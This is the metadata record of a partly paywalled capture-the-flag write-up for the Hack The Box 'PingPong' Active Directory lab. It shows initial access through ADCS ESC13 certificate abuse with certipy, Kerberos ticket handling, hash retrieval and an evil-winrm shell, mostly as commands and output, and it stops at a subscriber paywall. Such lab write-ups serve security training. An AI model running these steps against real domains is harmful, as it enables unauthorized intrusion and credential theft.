{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreif3ny63pau4ydwqyak5xrrai5swdzf4ah7ebqvf2iq5i3eaikgs7i",
"uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mkht636y7h72"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreienfxjuh3wm6konrh64i4k2vhouiv6mk2layqgvowpvxp6mk3r7ma"
},
"mimeType": "image/jpeg",
"size": 47595
},
"description": "BOX OVERVIEW\n\nDifficulty: Hard | OS: Windows | Type: Active Directory (Multi-Forest)\n\nPingPong is a hard Active Directory machine featuring two forests bridged by a bidirectional trust:\n\n * PING.HTB — DC1: dc1.ping.htb — external entry point (IP changes per reset)\n * PONG.HTB — DC2: dc2.pong.htb — internal-only, reachable via DC1\n\nNTLM is disabled on both domains — every authentication is Kerberos. The host clock has a significant skew from real UTC, requiring a clock workaround on every Kerb...",
"path": "/hack-the-box-season-10-htb-pingpong-writeup-insane-weekly-april-25th-2026/",
"publishedAt": "2026-04-25T06:00:00.000Z",
"site": "https://1337sheets.com",
"tags": [
"Subscribe now"
],
"textContent": "## Box Overview\n\n**Difficulty** : Hard | **OS** : Windows | **Type** : Active Directory (Multi-Forest)\n\nPingPong is a hard Active Directory machine featuring two forests bridged by a bidirectional trust:\n\n * **PING.HTB** — DC1: `dc1.ping.htb` — external entry point (IP changes per reset)\n * **PONG.HTB** — DC2: `dc2.pong.htb` — internal-only, reachable via DC1\n\n\n\nNTLM is **disabled on both domains** — every authentication is Kerberos. The host clock has a significant skew from real UTC, requiring a clock workaround on every Kerberos operation. RC4 is also disabled on PONG.HTB, mandating AES256 keys.\n\n**Targets** :\n\n * User flag: `C:\\Users\\C.Carlssen\\Desktop\\user.txt` on DC2\n * Root flag: `C:\\Users\\Administrator\\Desktop\\root.txt` on DC1\n\n\n\n* * *\n\n## Pre-Engagement Setup\n\n### Variables\n\n\n DC1_IP=<DC1_IP> # Changes per reset\n ATTACKER_IP=<ATTACKER_IP> # Your VPN IP — verify with `ip addr show tun0`\n DC2_IP=<DC2_INTERNAL_IP> # Fixed internal IP for DC2\n\n\n### /etc/hosts\n\n\n sudo sed -i \"/ping\\.htb/d;/pong\\.htb/d\" /etc/hosts\n echo \"<DC1_IP> dc1.ping.htb ping.htb\" | sudo tee -a /etc/hosts\n echo \"<DC2_INTERNAL_IP> dc2.pong.htb pong.htb\" | sudo tee -a /etc/hosts\n\n\n### /etc/krb5.conf\n\n\n [libdefaults]\n default_realm = PING.HTB\n dns_lookup_realm = false\n dns_lookup_kdc = false\n kdc_timesync = 1\n forwardable = true\n\n [realms]\n PING.HTB = {\n kdc = dc1.ping.htb\n admin_server = dc1.ping.htb\n }\n PONG.HTB = {\n kdc = dc2.pong.htb\n admin_server = dc2.pong.htb\n }\n\n [domain_realm]\n .ping.htb = PING.HTB\n ping.htb = PING.HTB\n .pong.htb = PONG.HTB\n pong.htb = PONG.HTB\n\n\n### Tmux Session\n\nCreate a clean tmux session for managing all interactive windows:\n\n\n tmux new-session -d -s pp -n work\n\n\nWindows we'll create:\n\n * `dc1` — evil-winrm shell on DC1 as c.roberts\n * `ligolo` — ligolo-proxy server\n * `mssql` — impacket-mssqlclient as C.Adam\n * `root` — evil-winrm as Administrator (final step)\n\n\n\n### Verify VPN IP\n\n**Critical** : Always verify your VPN IP before starting — it can change between sessions and the ligolo agent must connect back to the correct address:\n\n\n ip addr show tun0 | grep inet\n\n\n### Clock Skew Workaround\n\nThe DCs run on a clock that is significantly ahead of UTC. Wrap **every** Kerberos-related command with `faketime '+<Houur> hours'` to compensate. The exact offset can be discovered from the Kerberos error response or `nmap`'s clock-skew script.\n\n* * *\n\n## STEP 1 — Initial Access: ADCS ESC13 → WinRM on DC1\n\n**Entry credentials** (assumed breach scenario): `c.roberts / <REDACTED>` @ `ping.htb`\n\n### 1.1. Get Initial TGT\n\n\n faketime '+<Houur> hours' impacket-getTGT 'ping.htb/c.roberts:<REDACTED>' -dc-ip <DC1_IP>\n\n\n**Output** :\n\n\n [*] Saving ticket in c.roberts.ccache\n\n\n### 1.2. Enumerate ADCS\n\n\n KRB5CCNAME=c.roberts.ccache faketime '+<Houur> hours' certipy-ad find \\\n -u c.roberts@ping.htb -k -no-pass \\\n -dc-ip <DC1_IP> -target dc1.ping.htb -stdout\n\n\nKey findings:\n\n * **CA** : `ping-DC1-CA` on `dc1.ping.htb`\n * **TemporaryWinRM** template (ESC13): enrollable by Domain Users, Client Authentication EKU, issuance policy linked to `TempWinRMAccess` group\n * **SmartcardAuthentication** template: target for later ESC4\n\n\n\n### 1.3. Request TemporaryWinRM Certificate (ESC13)\n\nESC13: when a certificate template's issuance policy maps to a security group, enrolling the certificate transfers that group membership to the holder via the PAC's issuance policy SID extension.\n\n\n KRB5CCNAME=c.roberts.ccache faketime '+<Houur> hours' certipy-ad req \\\n -u c.roberts@ping.htb -k -no-pass \\\n -target dc1.ping.htb -dc-host dc1.ping.htb \\\n -ca ping-DC1-CA -template TemporaryWinRM\n\n\n**Output** :\n\n\n [*] Requesting certificate via RPC\n [*] Successfully requested certificate\n [*] Got certificate with UPN 'C.Roberts@ping.htb'\n [*] Certificate object SID is '<C_ROBERTS_SID>'\n [*] Saving certificate and private key to 'c.roberts.pfx'\n\n\n**c.roberts SID captured** — needed for the cross-forest DACL abuse later.\n\n### 1.4. PKINIT Authentication\n\nThe PKINIT TGT is special: it includes the issuance policy SID mapping that grants `TempWinRMAccess` membership. A password-based TGT does NOT include this. Use the PKINIT ccache for WinRM operations.\n\n\n rm -f c.roberts.ccache # Avoid the overwrite prompt\n faketime '+<Houur> hours' certipy-ad auth -pfx c.roberts.pfx -dc-ip <DC1_IP>\n\n\n**Output** :\n\n\n [*] Got TGT\n [*] Saving credential cache to 'c.roberts.ccache'\n [*] Got hash for 'c.roberts@ping.htb': <REDACTED>\n\n\n### 1.5. WinRM Shell on DC1\n\nOpen in tmux for persistence:\n\n\n tmux new-window -t pp -n dc1\n tmux send-keys -t pp:dc1 \"KRB5CCNAME=c.roberts.ccache faketime '+<Houur> hours' evil-winrm -i dc1.ping.htb -u c.roberts -r PING.HTB\" Enter\n\n\n**Verify access** :\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
"title": "Hack The Box - Season 10 HTB PingPong Writeup - INSANE- Weekly - April 25th, 2026",
"updatedAt": "2026-04-27T10:07:18.558Z"
}